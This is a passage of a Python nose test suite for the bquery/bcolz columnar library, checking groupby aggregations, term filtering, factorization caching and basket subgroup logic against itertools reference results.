    # bquery/bcolz create the rootdir themselves, so reserve a unique
    # name with mkdtemp and immediately remove the (empty) directory.
    self.rootdir = tempfile.mkdtemp(prefix='bcolz-')
    os.rmdir(self.rootdir)

    table = bquery.ctable(data, rootdir=self.rootdir)
    table.flush()

    yield bquery.open(self.rootdir)

    shutil.rmtree(self.rootdir)
    self.rootdir = None
def setup(self):
print('TestCtable.setup')
self.rootdir = None
def teardown(self):
print('TestCtable.teardown')
if self.rootdir:
shutil.rmtree(self.rootdir)
self.rootdir = None
def gen_dataset_count(self, N):
    """Generate *N* rows of grouped test data.

    Each row is (str key, float key, int key, int key, random float,
    random int, random int).  The four key columns repeat with period 10
    so rows fall into 'a'/'b'/'c' groups of sizes 2/3/5.
    """
    keys_str = itertools.cycle(['a'] * 2 + ['b'] * 3 + ['c'] * 5)
    keys_f8 = itertools.cycle([0.0] * 2 + [1.0] * 3 + [3.0] * 5)
    keys_i8 = itertools.cycle([0] * 2 + [1] * 3 + [3] * 5)
    keys_i4 = itertools.cycle([0] * 2 + [1] * 3 + [3] * 5)

    for _ in range(N):
        yield (next(keys_str),
               next(keys_f8),
               next(keys_i8),
               next(keys_i4),
               random.random(),
               random.randint(-10, 10),
               random.randint(-10, 10))
def gen_dataset_count_with_NA(self, N):
pool = itertools.cycle(['a', 'a',
'b', 'b', 'b',
'c', 'c', 'c', 'c', 'c'])
pool_b = itertools.cycle([0.0, 0.1,
1.0, 1.0, 1.0,
3.0, 3.0, 3.0, 3.0, 3.0])
pool_c = itertools.cycle([0, 0, 1, 1, 1, 3, 3, 3, 3, 3])
pool_d = itertools.cycle([0, 0, 1, 1, 1, 3, 3, 3, 3, 3])
pool_e = itertools.cycle([np.nan, 0.0,
np.nan, 1.0, 1.0,
np.nan, 3.0, 3.0, 3.0, 3.0])
for _ in range(N):
d = (
next(pool),
next(pool_b),
next(pool_c),
next(pool_d),
next(pool_e),
random.randint(- 10, 10),
random.randint(- 10, 10),
)
yield d
def gen_almost_unique_row(self, N):
pool = itertools.cycle(['a', 'b', 'c', 'd', 'e'])
pool_b = itertools.cycle([1.1, 1.2])
pool_c = itertools.cycle([1, 2, 3])
pool_d = itertools.cycle([1, 2, 3])
for _ in range(N):
d = (
next(pool),
next(pool_b),
next(pool_c),
next(pool_d),
random.random(),
random.randint(- 10, 10),
random.randint(- 10, 10),
)
yield d
def helper_itt_groupby(self, data, keyfunc):
groups = []
uniquekeys = []
data = sorted(data,
key=keyfunc) # mandatory before calling itertools groupby!
for k, g in itt.groupby(data, keyfunc):
groups.append(list(g)) # Store group iterator as a list
uniquekeys.append(k)
result = {
'groups': groups,
'uniquekeys': uniquekeys
}
return result
def test_groupby_01(self):
    """
    test_groupby_01: Test groupby's group creation
    (groupby single row results into multiple groups)
    """
    random.seed(1)
    groupby_cols = ['f0']
    groupby_lambda = lambda x: x[0]
    # no operation is specified in `agg_list`, so `sum` is used by default.
    agg_list = ['f4', 'f5', 'f6']
    num_rows = 2000
    # -- Data --
    g = self.gen_almost_unique_row(num_rows)
    data = np.fromiter(g, dtype='S1,f8,i8,i4,f8,i8,i4')
    # -- Bcolz --
    print('--> Bcolz')
    self.rootdir = tempfile.mkdtemp(prefix='bcolz-')
    os.rmdir(self.rootdir)  # folder should be empty; bquery creates it
    fact_bcolz = bquery.ctable(data, rootdir=self.rootdir)
    fact_bcolz.flush()
    fact_bcolz.cache_factor(groupby_cols, refresh=True)
    result_bcolz = fact_bcolz.groupby(groupby_cols, agg_list)
    print(result_bcolz)
    # Itertools reference result
    print('--> Itertools')
    result_itt = self.helper_itt_groupby(data, groupby_lambda)
    uniquekeys = result_itt['uniquekeys']
    print(uniquekeys)
    # the group keys produced by bquery must match the itertools reference
    assert_list_equal(list(result_bcolz['f0']), uniquekeys)
def test_groupby_02(self):
    """
    test_groupby_02: Test groupby's group creation
    (groupby over multiple rows results
    into multiple groups)
    """
    random.seed(1)
    groupby_cols = ['f0', 'f1', 'f2']
    groupby_lambda = lambda x: [x[0], x[1], x[2]]
    # no operation is specified in `agg_list`, so `sum` is used by default.
    agg_list = ['f4', 'f5', 'f6']
    num_rows = 2000
    # -- Data --
    g = self.gen_almost_unique_row(num_rows)
    data = np.fromiter(g, dtype='S1,f8,i8,i4,f8,i8,i4')
    # -- Bcolz --
    print('--> Bcolz')
    self.rootdir = tempfile.mkdtemp(prefix='bcolz-')
    os.rmdir(self.rootdir)  # folder should be empty; bquery creates it
    fact_bcolz = bquery.ctable(data, rootdir=self.rootdir)
    fact_bcolz.flush()
    fact_bcolz.cache_factor(groupby_cols, refresh=True)
    result_bcolz = fact_bcolz.groupby(groupby_cols, agg_list)
    print(result_bcolz)
    # Itertools reference result
    print('--> Itertools')
    result_itt = self.helper_itt_groupby(data, groupby_lambda)
    uniquekeys = result_itt['uniquekeys']
    print(uniquekeys)
    # sort both sides: bquery's multi-column group order is not guaranteed
    assert_list_equal(
        sorted([list(x) for x in result_bcolz[groupby_cols]]),
        sorted(uniquekeys))
def test_groupby_03(self):
    """
    test_groupby_03: Test groupby's aggregations
    (groupby single row results into multiple groups)
    Groupby type 'sum'
    """
    random.seed(1)
    groupby_cols = ['f0']
    groupby_lambda = lambda x: x[0]
    agg_list = ['f4', 'f5', 'f6']
    num_rows = 2000
    # -- Data --
    g = self.gen_almost_unique_row(num_rows)
    data = np.fromiter(g, dtype='S1,f8,i8,i4,f8,i8,i4')
    # -- Bcolz --
    print('--> Bcolz')
    self.rootdir = tempfile.mkdtemp(prefix='bcolz-')
    os.rmdir(self.rootdir)  # folder should be empty; bquery creates it
    fact_bcolz = bquery.ctable(data, rootdir=self.rootdir)
    fact_bcolz.flush()
    fact_bcolz.cache_factor(groupby_cols, refresh=True)
    result_bcolz = fact_bcolz.groupby(groupby_cols, agg_list)
    print(result_bcolz)
    # Itertools reference result
    print('--> Itertools')
    result_itt = self.helper_itt_groupby(data, groupby_lambda)
    print(result_itt['uniquekeys'])
    # reference: per-group sums of f4/f5/f6
    # (removed the unused `agg_lambda`; accumulate via sum() instead of
    # manual += loops -- same left-to-right addition order)
    ref = []
    for group in result_itt['groups']:
        key = groupby_lambda(group[0])
        f4 = sum(row[4] for row in group)
        f5 = sum(row[5] for row in group)
        f6 = sum(row[6] for row in group)
        ref.append([key, f4, f5, f6])
    assert_list_equal(
        [list(x) for x in result_bcolz], ref)
def test_groupby_04(self):
    """
    test_groupby_04: Test groupby's aggregation
    (groupby over multiple rows results
    into multiple groups)
    Groupby type 'sum'
    """
    random.seed(1)
    groupby_cols = ['f0', 'f1', 'f2']
    groupby_lambda = lambda x: [x[0], x[1], x[2]]
    agg_list = ['f4', 'f5', 'f6']
    num_rows = 2000
    # -- Data --
    g = self.gen_almost_unique_row(num_rows)
    data = np.fromiter(g, dtype='S1,f8,i8,i4,f8,i8,i4')
    # -- Bcolz --
    print('--> Bcolz')
    self.rootdir = tempfile.mkdtemp(prefix='bcolz-')
    os.rmdir(self.rootdir)  # folder should be empty; bquery creates it
    fact_bcolz = bquery.ctable(data, rootdir=self.rootdir)
    fact_bcolz.flush()
    fact_bcolz.cache_factor(groupby_cols, refresh=True)
    result_bcolz = fact_bcolz.groupby(groupby_cols, agg_list)
    print(result_bcolz)
    # Itertools reference result
    print('--> Itertools')
    result_itt = self.helper_itt_groupby(data, groupby_lambda)
    print(result_itt['uniquekeys'])
    # reference: per-group sums appended to the (list-valued) group key
    # (removed the unused `agg_lambda`; sum() replaces the manual += loops)
    ref = []
    for group in result_itt['groups']:
        key = groupby_lambda(group[0])
        f4 = sum(row[4] for row in group)
        f5 = sum(row[5] for row in group)
        f6 = sum(row[6] for row in group)
        ref.append(key + [f4, f5, f6])
    # sort both sides: multi-column group order is not guaranteed
    assert_list_equal(
        sorted([list(x) for x in result_bcolz]),
        sorted(ref))
def test_groupby_05(self):
    """
    test_groupby_05: Test groupby's group creation without cache
    Groupby type 'sum'

    Nose generator test: yields one assertion per groupby-column dtype.
    """
    random.seed(1)
    groupby_cols = ['f0']
    groupby_lambda = lambda x: x[0]
    agg_list = ['f1']
    num_rows = 200
    # exercise the no-cache factorization path for several dtypes
    for _dtype in [
                'i8',
                'i4',
                'f8',
                'S1',
            ]:
        # -- Data --
        if _dtype == 'S1':
            iterable = ((str(x % 5), x % 5) for x in range(num_rows))
        else:
            iterable = ((x % 5, x % 5) for x in range(num_rows))
        data = np.fromiter(iterable, dtype=_dtype + ',i8')
        # -- Bcolz --
        print('--> Bcolz')
        self.rootdir = tempfile.mkdtemp(prefix='bcolz-')
        os.rmdir(self.rootdir)  # folder should be empty; bquery creates it
        fact_bcolz = bquery.ctable(data, rootdir=self.rootdir)
        fact_bcolz.flush()
        # NB: no cache_factor() call -- groupby must factorize on the fly
        result_bcolz = fact_bcolz.groupby(groupby_cols, agg_list)
        print(result_bcolz)
        # Itertools reference result
        print('--> Itertools')
        result_itt = self.helper_itt_groupby(data, groupby_lambda)
        uniquekeys = result_itt['uniquekeys']
        print(uniquekeys)
        ref = []
        for item in result_itt['groups']:
            f1 = 0
            for row in item:
                f0 = row[0]
                f1 += row[1]
            ref.append([f0] + [f1])
        assert_list_equal(
            sorted([list(x) for x in result_bcolz]),
            sorted(ref))
        # yield a per-dtype check so nose reports each dtype separately
        yield self._assert_list_equal, list(result_bcolz['f0']), uniquekeys
def test_groupby_06(self):
    """
    test_groupby_06: Groupby type 'count'
    """
    random.seed(1)
    groupby_cols = ['f0']
    groupby_lambda = lambda x: x[0]
    agg_list = [['f4', 'count'], ['f5', 'count'], ['f6', 'count']]
    num_rows = 2000
    # -- Data -- (dataset without NaNs: every row counts)
    g = self.gen_dataset_count(num_rows)
    data = np.fromiter(g, dtype='S1,f8,i8,i4,f8,i8,i4')
    # -- Bcolz --
    print('--> Bcolz')
    self.rootdir = tempfile.mkdtemp(prefix='bcolz-')
    os.rmdir(self.rootdir)  # folder should be empty; bquery creates it
    fact_bcolz = bquery.ctable(data, rootdir=self.rootdir)
    fact_bcolz.flush()
    fact_bcolz.cache_factor(groupby_cols, refresh=True)
    result_bcolz = fact_bcolz.groupby(groupby_cols, agg_list)
    print(result_bcolz)
    # Itertools reference result
    print('--> Itertools')
    result_itt = self.helper_itt_groupby(data, groupby_lambda)
    uniquekeys = result_itt['uniquekeys']
    print(uniquekeys)
    ref = []
    for item in result_itt['groups']:
        f4 = 0
        f5 = 0
        f6 = 0
        for row in item:
            f0 = groupby_lambda(row)
            # no NaNs in this dataset, so the count is simply the group size
            f4 += 1
            f5 += 1
            f6 += 1
        ref.append([f0, f4, f5, f6])
    assert_list_equal(
        [list(x) for x in result_bcolz], ref)
def test_groupby_07(self):
    """
    test_groupby_07: Groupby type 'count' (dataset contains NaNs in f4)
    """
    random.seed(1)
    groupby_cols = ['f0']
    groupby_lambda = lambda x: x[0]
    agg_list = [['f4', 'count'], ['f5', 'count'], ['f6', 'count']]
    num_rows = 1000
    # -- Data --
    g = self.gen_dataset_count_with_NA(num_rows)
    data = np.fromiter(g, dtype='S1,f8,i8,i4,f8,i8,i4')
    # -- Bcolz --
    print('--> Bcolz')
    self.rootdir = tempfile.mkdtemp(prefix='bcolz-')
    os.rmdir(self.rootdir)  # folder should be empty; bquery creates it
    fact_bcolz = bquery.ctable(data, rootdir=self.rootdir)
    fact_bcolz.flush()
    fact_bcolz.cache_factor(groupby_cols, refresh=True)
    result_bcolz = fact_bcolz.groupby(groupby_cols, agg_list)
    print(result_bcolz)
    # Itertools reference result
    print('--> Itertools')
    result_itt = self.helper_itt_groupby(data, groupby_lambda)
    uniquekeys = result_itt['uniquekeys']
    print(uniquekeys)
    ref = []
    for item in result_itt['groups']:
        f4 = 0
        f5 = 0
        f6 = 0
        for row in item:
            f0 = groupby_lambda(row)
            # NaN != NaN, so this self-comparison skips NaN rows: 'count'
            # is expected to ignore NA values in the aggregated column
            if row[4] == row[4]:
                f4 += 1
            f5 += 1
            f6 += 1
        ref.append([f0, f4, f5, f6])
    assert_list_equal(
        [list(x) for x in result_bcolz], ref)
def _get_unique(self, values):
new_values = []
nan_found = False
for item in values:
if item not in new_values:
if item == item:
new_values.append(item)
else:
if not nan_found:
new_values.append(item)
nan_found = True
return new_values
def gen_dataset_count_with_NA_08(self, N):
pool = itertools.cycle(['a', 'a',
'b', 'b', 'b',
'c', 'c', 'c', 'c', 'c'])
pool_b = itertools.cycle([0.0, 0.1,
1.0, 1.0, 1.0,
3.0, 3.0, 3.0, 3.0, 3.0])
pool_c = itertools.cycle([0, 0, 1, 1, 1, 3, 3, 3, 3, 3])
pool_d = itertools.cycle([0, 0, 1, 1, 1, 3, 3, 3, 3, 3])
pool_e = itertools.cycle([np.nan, 0.0,
np.nan, 0.0, 1.0,
np.nan, 3.0, 1.0, 3.0, 1.0])
for _ in range(N):
d = (
next(pool),
next(pool_b),
next(pool_c),
next(pool_d),
next(pool_e),
random.randint(- 500, 500),
random.randint(- 100, 100),
)
yield d
def test_groupby_08(self):
    """
    test_groupby_08: Groupby's type 'count_distinct'
    """
    random.seed(1)
    groupby_cols = ['f0']
    groupby_lambda = lambda x: x[0]
    agg_list = [['f4', 'count_distinct'], ['f5', 'count_distinct'], ['f6', 'count_distinct']]
    num_rows = 2000
    # -- Data --
    g = self.gen_dataset_count_with_NA_08(num_rows)
    data = np.fromiter(g, dtype='S1,f8,i8,i4,f8,i8,i4')
    print('data')
    print(data)
    # -- Bcolz --
    print('--> Bcolz')
    self.rootdir = tempfile.mkdtemp(prefix='bcolz-')
    os.rmdir(self.rootdir)  # folder should be empty; bquery creates it
    fact_bcolz = bquery.ctable(data, rootdir=self.rootdir)
    fact_bcolz.flush()
    fact_bcolz.cache_factor(groupby_cols, refresh=True)
    result_bcolz = fact_bcolz.groupby(groupby_cols, agg_list)
    print(result_bcolz)
    # Itertools reference result
    print('--> Itertools')
    result_itt = self.helper_itt_groupby(data, groupby_lambda)
    uniquekeys = result_itt['uniquekeys']
    print(uniquekeys)
    # reference: per-group count of distinct values (NaN counted once)
    # (was `enumerate(zip(...))` with an unused loop variable and
    # re-indexing by n -- iterate the pairs directly instead)
    ref = []
    for key, group in zip(uniquekeys, result_itt['groups']):
        f4 = len(self._get_unique([row[4] for row in group]))
        f5 = len(self._get_unique([row[5] for row in group]))
        f6 = len(self._get_unique([row[6] for row in group]))
        ref.append([key, f4, f5, f6])
    assert_list_equal(
        [list(x) for x in result_bcolz], ref)
def test_groupby_08b(self):
    """
    test_groupby_08b: Groupby's type 'count_distinct' with a large number of records
    """
    random.seed(1)
    groupby_cols = ['f0']
    groupby_lambda = lambda x: x[0]
    agg_list = [['f4', 'count_distinct'], ['f5', 'count_distinct'], ['f6', 'count_distinct']]
    num_rows = 200000
    # -- Data --
    g = self.gen_dataset_count_with_NA_08(num_rows)
    data = np.fromiter(g, dtype='S1,f8,i8,i4,f8,i8,i4')
    print('data')
    print(data)
    # -- Bcolz --
    print('--> Bcolz')
    self.rootdir = tempfile.mkdtemp(prefix='bcolz-')
    os.rmdir(self.rootdir)  # folder should be empty; bquery creates it
    fact_bcolz = bquery.ctable(data, rootdir=self.rootdir)
    fact_bcolz.flush()
    fact_bcolz.cache_factor(groupby_cols, refresh=True)
    result_bcolz = fact_bcolz.groupby(groupby_cols, agg_list)
    print(result_bcolz)
    # Itertools reference result
    print('--> Itertools')
    result_itt = self.helper_itt_groupby(data, groupby_lambda)
    uniquekeys = result_itt['uniquekeys']
    print(uniquekeys)
    # reference: per-group count of distinct values (NaN counted once)
    # (was `enumerate(zip(...))` with an unused loop variable and
    # re-indexing by n -- iterate the pairs directly instead)
    ref = []
    for key, group in zip(uniquekeys, result_itt['groups']):
        f4 = len(self._get_unique([row[4] for row in group]))
        f5 = len(self._get_unique([row[5] for row in group]))
        f6 = len(self._get_unique([row[6] for row in group]))
        ref.append([key, f4, f5, f6])
    assert_list_equal(
        [list(x) for x in result_bcolz], ref)
def gen_dataset_count_with_NA_09(self, N):
pool = (random.choice(['a', 'b', 'c']) for _ in range(N))
pool_b = (random.choice([0.1, 0.2, 0.3]) for _ in range(N))
pool_c = (random.choice([0, 1, 2, 3]) for _ in range(N))
pool_d = (random.choice([0, 1, 2, 3]) for _ in range(N))
pool_e = (math.ceil(x) for x in np.arange(0, N * 0.1, 0.1))
pool_f = (math.ceil(x) for x in np.arange(0, N * 0.3, 0.3))
pool_g = (math.ceil(x) for x in np.arange(0, N, 1))
for _ in range(N):
d = (
next(pool),
next(pool_b),
next(pool_c),
next(pool_d),
# --
next(pool_e),
next(pool_f),
next(pool_g),
)
yield d
def test_groupby_09(self):
    """
    test_groupby_09: Groupby's type 'sorted_count_distinct'
    """
    random.seed(1)
    groupby_cols = ['f0']
    groupby_lambda = lambda x: x[0]
    agg_list = [['f4', 'sorted_count_distinct'], ['f5', 'sorted_count_distinct'], ['f6', 'sorted_count_distinct']]
    num_rows = 2000
    # -- Data --
    # sorted_count_distinct requires input pre-sorted on the groupby column
    # (was `sorted([item for item in g], ...)` -- the throwaway list
    # comprehension is unnecessary, sorted() accepts any iterable)
    g = self.gen_dataset_count_with_NA_09(num_rows)
    sort = sorted(g, key=lambda x: x[0])
    data = np.fromiter(sort, dtype='S1,f8,i8,i4,f8,i8,i4')
    print('data')
    print(data)
    # -- Bcolz --
    print('--> Bcolz')
    self.rootdir = tempfile.mkdtemp(prefix='bcolz-')
    os.rmdir(self.rootdir)  # folder should be empty; bquery creates it
    fact_bcolz = bquery.ctable(data, rootdir=self.rootdir)
    fact_bcolz.flush()
    result_bcolz = fact_bcolz.groupby(groupby_cols, agg_list)
    print(result_bcolz)
    # Itertools reference result
    print('--> Itertools')
    result_itt = self.helper_itt_groupby(data, groupby_lambda)
    uniquekeys = result_itt['uniquekeys']
    print(uniquekeys)
    # reference: per-group count of distinct values
    ref = []
    for key, group in zip(uniquekeys, result_itt['groups']):
        f4 = len(self._get_unique([row[4] for row in group]))
        f5 = len(self._get_unique([row[5] for row in group]))
        f6 = len(self._get_unique([row[6] for row in group]))
        ref.append([key, f4, f5, f6])
    print(ref)
    assert_list_equal(
        [list(x) for x in result_bcolz], ref)
def test_groupby_10(self):
    """
    test_groupby_10: Groupby's 'sorted_count_distinct', no column provided
    """
    random.seed(1)
    groupby_cols = []
    agg_list = [['f1', 'sorted_count_distinct'], ['f2', 'sorted_count_distinct']]
    # -- Data --
    # (removed the unused `num_rows`; the dataset is hard-coded)
    # f1 holds 4 distinct values (1..4), f2 holds 2 (1, 2)
    data = np.array(
        [(0, 1, 1),
         (1, 1, 1),
         (1, 2, 1),
         (0, 2, 1),
         (1, 2, 1),
         (2, 2, 1),
         (0, 3, 2),
         (0, 3, 2),
         (1, 4, 2)],
        dtype='i8,i8,i8')
    # -- Bcolz --
    with self.on_disk_data_cleaner(data) as ct:
        result_bcolz = ct.groupby(groupby_cols, agg_list)
        # single global group: distinct counts over the whole table
        assert_list_equal([list(x) for x in result_bcolz], [[4, 2]])
def test_groupby_11(self):
    """
    test_groupby_11: Groupby's 'sorted_count_distinct', pre-filter &
    no column provided
    """
    random.seed(1)
    groupby_cols = []
    agg_list = [['f1', 'sorted_count_distinct'], ['f2', 'sorted_count_distinct']]
    # -- Data --
    # (removed the unused `num_rows`; the dataset is hard-coded)
    data = np.array(
        [(0, 1, 1),
         (1, 1, 1),
         (1, 2, 1),
         (0, 2, 1),
         (1, 2, 1),
         (2, 2, 1),
         (0, 3, 2),
         (0, 3, 2),
         (1, 4, 2)],
        dtype='i8,i8,i8')
    with self.on_disk_data_cleaner(data) as ct:
        # keep only rows with f0 == 0; their f1 values are {1, 2, 3}
        barr = ct.where_terms([('f0', 'in', [0])])
        result_bcolz = ct.groupby(groupby_cols, agg_list,
                                  bool_arr=barr)
        assert_list_equal([list(x) for x in result_bcolz], [[3, 2]])
def test_groupby_12(self):
    """
    test_groupby_12: Groupby's 'sorted_count_distinct', no column provided
    """
    random.seed(1)
    groupby_cols = []
    agg_list = [['f1', 'sorted_count_distinct']]
    # -- Data --
    # (removed the unused `num_rows`; the dataset is hard-coded)
    # f1 holds 4 distinct values (1..4)
    data = np.array(
        [(0, 1),
         (1, 1),
         (1, 2),
         (0, 2),
         (1, 2),
         (2, 2),
         (0, 3),
         (0, 3),
         (1, 4)],
        dtype='i8,i8')
    with self.on_disk_data_cleaner(data) as ct:
        result_bcolz = ct.groupby(groupby_cols, agg_list)
        assert_list_equal([list(x) for x in result_bcolz], [[4]])
def test_groupby_13(self):
    """
    test_groupby_13: Groupby's 'sorted_count_distinct', pre-filter
    """
    random.seed(1)
    groupby_cols = ['f0']
    agg_list = [['f1', 'sorted_count_distinct']]
    # -- Data --
    data = np.array(
        [(0, 1),
         (1, 1),
         (1, 2),
         (0, 2),
         (1, 2),
         (2, 2),
         (0, 3),
         (0, 3),
         (1, 4)],
        dtype='i8,i8')
    # -- Bcolz --
    with self.on_disk_data_cleaner(data) as ct:
        # drop the f0 == 2 row; groups 0 and 1 each keep 3 distinct f1 values
        barr = ct.where_terms([('f0', 'in', [0, 1])])
        result_bcolz = ct.groupby(groupby_cols, agg_list,
                                  bool_arr=barr)
        assert_list_equal([list(x) for x in result_bcolz], [[0, 3], [1, 3]])
def test_groupby_14(self):
    """
    test_groupby_14: Groupby type 'mean'
    """
    random.seed(1)
    groupby_cols = ['f0']
    groupby_lambda = lambda x: x[0]
    agg_list = [['f4', 'mean'], ['f5', 'mean'], ['f6', 'mean']]
    num_rows = 2000
    # -- Data --
    g = self.gen_almost_unique_row(num_rows)
    data = np.fromiter(g, dtype='S1,f8,i8,i4,f8,i8,i4')
    # -- Bcolz --
    print('--> Bcolz')
    self.rootdir = tempfile.mkdtemp(prefix='bcolz-')
    os.rmdir(self.rootdir)  # folder should be empty; bquery creates it
    fact_bcolz = bquery.ctable(data, rootdir=self.rootdir)
    fact_bcolz.flush()
    fact_bcolz.cache_factor(groupby_cols, refresh=True)
    result_bcolz = fact_bcolz.groupby(groupby_cols, agg_list)
    print(result_bcolz)
    # Itertools reference result
    print('--> Itertools')
    result_itt = self.helper_itt_groupby(data, groupby_lambda)
    print(result_itt['uniquekeys'])
    # reference: per-group means of f4/f5/f6
    # (removed the unused `agg_lambda` and the dead per-row `f0` binding)
    ref = []
    for group in result_itt['groups']:
        f4 = [row[4] for row in group]
        f5 = [row[5] for row in group]
        f6 = [row[6] for row in group]
        ref.append([np.mean(f4), np.mean(f5), np.mean(f6)])
    # remove the first (text) element for floating point comparison
    result = [list(x[1:]) for x in result_bcolz]
    assert_allclose(result, ref, rtol=1e-10)
def test_groupby_15(self):
    """
    test_groupby_15: Groupby type 'std'
    """
    random.seed(1)
    groupby_cols = ['f0']
    groupby_lambda = lambda x: x[0]
    agg_list = [['f4', 'std'], ['f5', 'std'], ['f6', 'std']]
    num_rows = 2000
    # -- Data --
    g = self.gen_almost_unique_row(num_rows)
    data = np.fromiter(g, dtype='S1,f8,i8,i4,f8,i8,i4')
    # -- Bcolz --
    print('--> Bcolz')
    self.rootdir = tempfile.mkdtemp(prefix='bcolz-')
    os.rmdir(self.rootdir)  # folder should be empty; bquery creates it
    fact_bcolz = bquery.ctable(data, rootdir=self.rootdir)
    fact_bcolz.flush()
    fact_bcolz.cache_factor(groupby_cols, refresh=True)
    result_bcolz = fact_bcolz.groupby(groupby_cols, agg_list)
    print(result_bcolz)
    # Itertools reference result
    print('--> Itertools')
    result_itt = self.helper_itt_groupby(data, groupby_lambda)
    print(result_itt['uniquekeys'])
    # reference: per-group population std-devs of f4/f5/f6
    # (removed the unused `agg_lambda` and the dead per-row `f0` binding)
    ref = []
    for group in result_itt['groups']:
        f4 = [row[4] for row in group]
        f5 = [row[5] for row in group]
        f6 = [row[6] for row in group]
        ref.append([np.std(f4), np.std(f5), np.std(f6)])
    # remove the first (text) element for floating point comparison
    result = [list(x[1:]) for x in result_bcolz]
    assert_allclose(result, ref, rtol=1e-10)
def _assert_list_equal(self, a, b):
    # Bound-method wrapper around nose's assert_list_equal so that the
    # generator test in test_groupby_05 can yield it as a callable.
    assert_list_equal(a, b)
def test_where_terms00(self):
    """
    test_where_terms00: get terms in one column bigger than a certain value
    """
    # expected result: boolean mask, True for x > 10000
    ref_data = np.fromiter(((x > 10000) for x in range(20000)),
                           dtype='bool')
    ref_result = bquery.carray(ref_data)
    # generate data to filter on
    iterable = ((x, x) for x in range(20000))
    data = np.fromiter(iterable, dtype='i8,i8')
    # filter data
    terms_filter = [('f0', '>', 10000)]
    ct = bquery.ctable(data, rootdir=self.rootdir)
    result = ct.where_terms(terms_filter)
    # compare
    assert_array_equal(result, ref_result)
def test_where_terms01(self):
    """
    test_where_terms01: get terms in one column less or equal than a
    certain value
    """
    # expected result: boolean mask, True for x <= 10000
    ref_data = np.fromiter(((x <= 10000) for x in range(20000)),
                           dtype='bool')
    ref_result = bquery.carray(ref_data)
    # generate data to filter on
    iterable = ((x, x) for x in range(20000))
    data = np.fromiter(iterable, dtype='i8,i8')
    # filter data
    terms_filter = [('f0', '<=', 10000)]
    ct = bquery.ctable(data, rootdir=self.rootdir)
    result = ct.where_terms(terms_filter)
    # compare
    assert_array_equal(result, ref_result)
def test_where_terms02(self):
    """
    test_where_terms02: get mask where terms not in list
    """
    exclude = [0, 1, 2, 3, 11, 12, 13]
    # expected result: all True except the excluded positions
    mask = np.ones(20000, dtype=bool)
    mask[exclude] = False
    # generate data to filter on
    iterable = ((x, x) for x in range(20000))
    data = np.fromiter(iterable, dtype='i8,i8')
    # filter data
    terms_filter = [('f0', 'not in', exclude)]
    ct = bquery.ctable(data, rootdir=self.rootdir)
    result = ct.where_terms(terms_filter)
    assert_array_equal(result, mask)
def test_where_terms03(self):
    """
    test_where_terms03: get mask where terms in list
    """
    include = [0, 1, 2, 3, 11, 12, 13]
    # expected result: all False except the included positions
    mask = np.zeros(20000, dtype=bool)
    mask[include] = True
    # generate data to filter on
    iterable = ((x, x) for x in range(20000))
    data = np.fromiter(iterable, dtype='i8,i8')
    # filter data
    terms_filter = [('f0', 'in', include)]
    ct = bquery.ctable(data, rootdir=self.rootdir)
    result = ct.where_terms(terms_filter)
    assert_array_equal(result, mask)
def test_where_terms_04(self):
    """
    test_where_terms_04: get mask where terms in list with only one item
    """
    include = [0]
    # expected result: only position 0 is True
    mask = np.zeros(20000, dtype=bool)
    mask[include] = True
    # generate data to filter on
    iterable = ((x, x) for x in range(20000))
    data = np.fromiter(iterable, dtype='i8,i8')
    # filter data
    terms_filter = [('f0', 'in', include)]
    ct = bquery.ctable(data, rootdir=self.rootdir)
    result = ct.where_terms(terms_filter)
    assert_array_equal(result, mask)
def test_factorize_groupby_cols_01(self):
    """
    test_factorize_groupby_cols_01: factorization of a groupby column and
    its cache behaviour
    """
    ref_fact_table = np.arange(20000) % 5
    ref_fact_groups = np.arange(5)
    # generate data
    iterable = ((x, x % 5) for x in range(20000))
    data = np.fromiter(iterable, dtype='i8,i8')
    ct = bquery.ctable(data, rootdir=tempfile.mkdtemp(prefix='bcolz-'), mode='w')
    # factorize - check the only factorized col. [0]
    fact_1 = ct.factorize_groupby_cols(['f1'])
    # cache should be used this time; results must be identical
    fact_2 = ct.factorize_groupby_cols(['f1'])
    assert_array_equal(ref_fact_table, fact_1[0][0])
    assert_array_equal(ref_fact_groups, fact_1[1][0])
    assert_array_equal(fact_1[0][0], fact_2[0][0])
    assert_array_equal(fact_1[1][0], fact_2[1][0])
def test_pos_basket_01(self):
    """test_pos_basket_01:
    <----- data ----->
    | Basket | Product | Filter | Result |
    |--------|---------|--------|--------|
    | 1      | A       | 0      | 1      |
    | 1      | B       | 1      | 1      |
    | 1      | C       | 0      | 1      |
    | 2      | A       | 0      | 1      |
    | 2      | B       | 1      | 1      |
    | 3      | A       | 0      | 0      |
    | 4      | A       | 0      | 0      |
    | 4      | C       | 0      | 0      |
    | 5      | B       | 1      | 1      |
    | 6      | A       | 0      | 1      |
    | 6      | B       | 1      | 1      |
    | 6      | C       | 0      | 1      |
    | 7      | B       | 1      | 1      |
    | 7      | B       | 1      | 1      |
    | 7      | B       | 1      | 1      |
    | 8      | B       | 1      | 1      |
    | 9      | C       | 0      | 0      |
    """
    # -- Data --
    # f0 = basket id, f1 = product code (A=0, B=1, C=2)
    data = np.array(
        [(1, 0),
         (1, 1),
         (1, 2),
         (2, 0),
         (2, 1),
         (3, 0),
         (4, 0),
         (4, 2),
         (5, 1),
         (6, 0),
         (6, 1),
         (6, 2),
         (7, 1),
         (7, 1),
         (7, 1),
         (8, 1),
         (9, 2),
         ],
        dtype='i8,i8')
    # -- Bcolz --
    with self.on_disk_data_cleaner(data) as ct:
        f1 = ct['f1']
        barr = bz.eval("f1 == 1")  # filter
        # mark every row of any basket that contains at least one
        # filtered (product B) row
        result = ct.is_in_ordered_subgroups(basket_col='f0', bool_arr=barr,
                                            _max_len_subgroup=1)
        assert_list_equal(list(barr[:]),
                          [False, True, False, False, True, False, False, False,
                           True, False, True, False, True, True, True, True,
                           False])
        assert_list_equal(list(result[:]),
                          [True, True, True, True, True, False, False, False,
                           True, True, True, True, True, True, True, True,
                           False])
if __name__ == '__main__':
    # run the suite through nose's test collector when invoked directly
    nose.main()
| 31.774884
| 118
| 0.49353
| 4,138
| 34,158
| 3.898018
| 0.063074
| 0.03478
| 0.013763
| 0.017855
| 0.829076
| 0.794048
| 0.77204
| 0.76212
| 0.751457
| 0.746683
| 0
| 0.04953
| 0.374641
| 34,158
| 1,074
| 119
| 31.804469
| 0.705585
| 0.119269
| 0
| 0.735376
| 0
| 0
| 0.050853
| 0.006485
| 0
| 0
| 0
| 0
| 0.045961
| 1
| 0.047354
| false
| 0
| 0.020891
| 0
| 0.072423
| 0.079387
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
